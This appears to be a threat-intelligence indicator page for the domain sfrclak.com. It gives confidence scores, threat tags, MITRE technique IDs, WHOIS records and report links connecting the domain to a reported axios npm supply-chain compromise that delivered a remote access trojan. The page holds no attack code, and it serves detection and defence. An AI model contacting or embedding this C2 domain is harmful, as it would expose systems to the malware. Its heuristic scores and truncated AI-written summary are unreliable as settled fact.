IOC Radar
DomainMediumSignal 90/100

sfrclak.com

Location
United StatesUnited States
First Seen
Mar 31, 2026
Last Seen
Jun 9, 2026
Mar 31
First Seen
76d ago
Jun 9
Last Seen
6d ago
16
Reports
source reports
90%
Confidence
medium
Found in 16 reports. Confidence: medium. · Confidence scores are heuristic. Verify before acting on results.
Domain Name
Malicious domain used for C2, phishing, or malware distribution.
MISP Category
Network Activity
Confidence
90%
Signal Score
90 / 100
IDS Rule
No
Threat Context
Tags
MITRE ATT&CK

MITRE ATT&CK TTPs

58 techniques

Feed Intelligence Summary

16 reports90% confidence
16
Source reports
90%
Confidence score
Category tags
abuseabusech-threatfox-c2cacceptactive scanalienvault_ransomwareansiapi keyaptapt38attackaxiosaxios libraryaxios packageaxios-npmbad reputationblock-or-filter-listbluenoroffbrute forcec2c2 domainc2 ipc2 postc2 serverc2 suspectedc2 urlci/cd pipelinescicdck idclickclick-based attackclosecode injectioncommand & controlcommand executioncommunication protocolcomspeccontactcontacted hostscopycredential compromisecredential stuffingcredential-stealercredential-theftcross-platformcross-platform ratcryptocurrencycsa-260455data accessdata copyingdata exfiltrationdata store exposuredata transferdata-exfiltrationdata-extortiondependency poisoningdestdeveloper environmentsdprkdprk attributionenomenumerationexploitation activityfactoryfamily notesfamous chollimafilefinance and insuranceflaggeckogithub actionshostilehostshttphttp scannerhybridhybrid analysisidentity & access exploitationindicatorinformation technologyinfostealeringress tool transferinjection activityinput validation bypassinstalliocsiocs domainsiot securityit - securityit infrastructurejavascript trojankicskimsukylinuxlinux pythonlocalmacosmalicious activitymalicious downloadmalicious linksmalicious powershell activitymalicious softwaremalwaremalware distributionmitre attmobile threatmodelmonitormoziname servernation-state activitynative binarynetworknorth americanpmnpm hijackingnpm package compromisenpm supplychainonlineoperating systemos versionpathpath traversalpcappcap processingphishingplain-crypto-jspleaseplease notepost bodypost-install executionpostinstall scriptpowershellprefetch8 ansiprocess injectionpythonransomwareratrat deploymentrefreshremote accessremote access trojanremote-access-trojanreportreport domainresearchedretail tradereturnsrisk detectionrotate npmruntime processsandboxscripting attackssecurity operationsservershinyhuntersshow processsilkbell nasocial engineeringsoftware developmentstagestardust chollimastringssubmitsupply chainsupply chain attacksupply chain compromisessupply-chaint1003t1005t1007t1021t1021.001t1027t1030t1033t1036t1036.004t1041t1055t1056t1057t1059t1059.001t1059.002t1059.003t1059.004t1059.005t1059.006t1059.007t1069.001t1070.004t1071.001t1078t1082t1083t1086t1090t1095t1098t1102.002t1104t1105t1134t1136t1140t1143t1190t1195t1195.001t1195.002t1204.001t1204.002t1213t1219t1486t1499.002t1505.003t1543t1546.016t1547.001t1552.001t1565t1566t1567t1587.001tempthreat actorthreat intelligencethreat leveltor nodetrojantrojan malwaretruesectypeunc1069unc6661unitedunited statesurlsususer executionverifyvetting processvishingwaveshaper overlapwaveshaper.v2web application attackweb application exploitationweb exploitationweb trafficwindowwindowswriteyara

Activity Timeline

1 total obs
Jun 9Jun 9

Threat Activity Heatmap

· Peak: 2026-06-09
Less
More
Mon
Wed
Fri
Jun
·
·
Jul
·
·
·
Aug
·
·
·
Sep
·
·
·
·
Oct
·
·
·
Nov
·
·
·
Dec
·
·
·
·
Jan
·
·
·
Feb
·
·
·
Mar
·
·
·
·
Apr
·
·
·
May
·
·
·
Jun
·
24h
0
Dormant
7d
1
Minimal
30d
1
Minimal
3mo
1
Minimal
Intelligence SummaryAI Generated

The domain sfrclak.com has emerged as a significant indicator of compromise (IOC) linked to multiple cyber threats originating from the United States. First observed on March

Threat ScoreHigh Risk
90
SIGNAL
Signal Score
90%
Confidence
16
Reports
First seenMar 31, 2026
Last seenJun 9, 2026

VirusTotal

Not checked

WHOIS

registrar
NAMECHEAP INC
description
LTNA Cyber provides additional enrichment for domain and URL indicators, including RIR and DNS intelligence, domain registration context, routing verification, BGP stream visibility, and GeoIP/ISP attribution. Learn more: https://ltna.com.au/cyber
domain rank
-1
raw
Admin City: Reykjavik Admin Country: IS Admin Email: [email protected] Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Postal Code: 101 Admin State/Province: Capital Region Creation Date: 2026-03-30T16:03:46.00Z Creation Date: 2026-03-30T16:03:46Z DNSSEC: unsigned Domain Name: SFRCLAK.COM Domain Status: addPeriod https://icann.org/epp#addPeriod Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain name: sfrclak.com Name Server: DNS1.REGISTRAR-SERVERS.COM Name Server: DNS2.REGISTRAR-SERVERS.COM Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com Registrant City: ddbf76e4e8cee320 Registrant Country: IS Registrant Email: [email protected] Registrant Fax Ext: 3432650ec337c945 Registrant Fax: 3432650ec337c945 Registrant Name: 37bfbc24cafea5d2 Registrant Organization: 4b7a0912c26a13e2 Registrant Phone Ext: 3432650ec337c945 Registrant Phone: 1c9a7bcdeaf95e9f Registrant Postal Code: f206c9d9737ad45d Registrant State/Province: 3e0204199d8ebf9c Registrant Street: c6523241936df1ba Registrar Abuse Contact Email: [email protected] Registrar Abuse Contact Phone: +1.6613102107 Registrar Abuse Contact Phone: +1.9854014545 Registrar IANA ID: 1068 Registrar Registration Expiration Date: 2027-03-30T16:03:46.00Z Registrar URL: http://www.namecheap.com Registrar WHOIS Server: whois.namecheap.com Registrar: NAMECHEAP INC Registrar: NameCheap, Inc. Registry Domain ID: 3082352565_DOMAIN_COM-VRSN Registry Expiry Date: 2027-03-30T16:03:46Z Tech City: Reykjavik Tech Country: IS Tech Email: [email protected] Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Postal Code: 101 Tech State/Province: Capital Region Updated Date: 0001-01-01T00:00:00.00Z Updated Date: 2026-03-30T16:03:53Z
references
https://unit42.paloaltonetworks.com/axios-supply-chain-attack/, https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections, https://www.sentinelone.com/blog/securing-the-supply-chain-how-sentinelones-ai-edr-stops-the-axios-attack-autonomously/, https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package/, https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all, https://nsfocusglobal.com/axios-front-end-library-npm-supply-chain-poisoning-alert/, https://www.wiz.io/blog/axios-npm-compromised-in-supply-chain-attack, https://www.huntress.com/blog/supply-chain-compromise-axios-npm-package, https://ltna.com.au/cyber, https://hybrid-analysis.com/sample/4549eed582050392e9cecd9b69f0d8d796fd5132e47a2e8161c4bf76ed176a9e/5e690fae4c892737e7365efe, https://hybrid-analysis.com/sample/4549eed582050392e9cecd9b69f0d8d796fd5132e47a2e8161c4bf76ed176a9e/5f7728aa32edd97f433dbb02, https://hybrid-analysis.com/sample/a7a080e1e8bbd8b71a897b4d8d9d549207c2931a5e416c4599fc5cf51fc357c6, https://hybrid-analysis.com/sample/e05affb84f4d1e1f2fb5f0200d819ffa64e3bc17c9e9b56f46a910b1c08f95e4/69d48a496246d30efa004564, https://www.truesec.com/hub/blog/malicious-axios-packages-npm-in-supply-chain-compromise, https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan, https://www.derp.ca/research/axios-npm-supply-chain-rat/, https://socket.dev/blog/axios-npm-package-compromised, https://socradar.io/blog/axios-npm-supply-chain-attack-2026-ciso-guide/, https://www.malwarebytes.com/blog/news/2026/03/axios-supply-chain-attack-chops-away-at-npm-trust, https://www.crowdstrike.com/en-us/blog/stardust-chollima-likely-compromises-axios-npm-package/, https://blog.nviso.eu/2026/04/03/the-axios-npm-supply-chain-incident-fake-dependency-real-backdoor/, https://hunt.io/blog/axios-supply-chain-attack-ta444-bluenoroff, https://www.zscaler.com/blogs/security-research/supply-chain-attacks-surge-march-2026, https://blog.talosintelligence.com/axois-npm-supply-chain-incident/, https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package, IOCs.2026.pdf, https://x.com/skocherhan/status/2038818679500968303, https://x.com/skocherhan/status/2038835902126911631, https://x.com/skocherhan/status/2038835944975921553, https://x.com/skocherhan/status/2038841954511851692, https://x.com/skocherhan/status/2038846932651536633, https://x.com/skocherhan/status/2038847155067101680, https://x.com/skocherhan/status/2038847230610751909, https://x.com/skocherhan/status/2038856176574640271, https://x.com/skocherhan/status/2038856660479799517, https://x.com/skocherhan/status/2038858417603858543, https://x.com/skocherhan/status/2038879627490287762, https://x.com/skocherhan/status/2038933211967799532, https://x.com/skocherhan/status/2038933224492064829, https://x.com/skocherhan/status/2039031536285020495, https://x.com/skocherhan/status/2039032037785440536, https://x.com/skocherhan/status/2039033058163081616, https://x.com/skocherhan/status/2039049022321668098, https://x.com/skocherhan/status/2039051912159338520, https://x.com/skocherhan/status/2039073222650445939, https://x.com/skocherhan/status/2039075319181611489, https://x.com/skocherhan/status/2039076163088162984, https://x.com/skocherhan/status/2039087968497901575, https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan#indicators-of-compromise
subdomains count
0

Export & API

STIX 2.1 Bundle
CSV Export
Permalink

IOC Journey

medium
First detected 2 months ago · Last seen 6 days ago
Appeared in 16 threat reports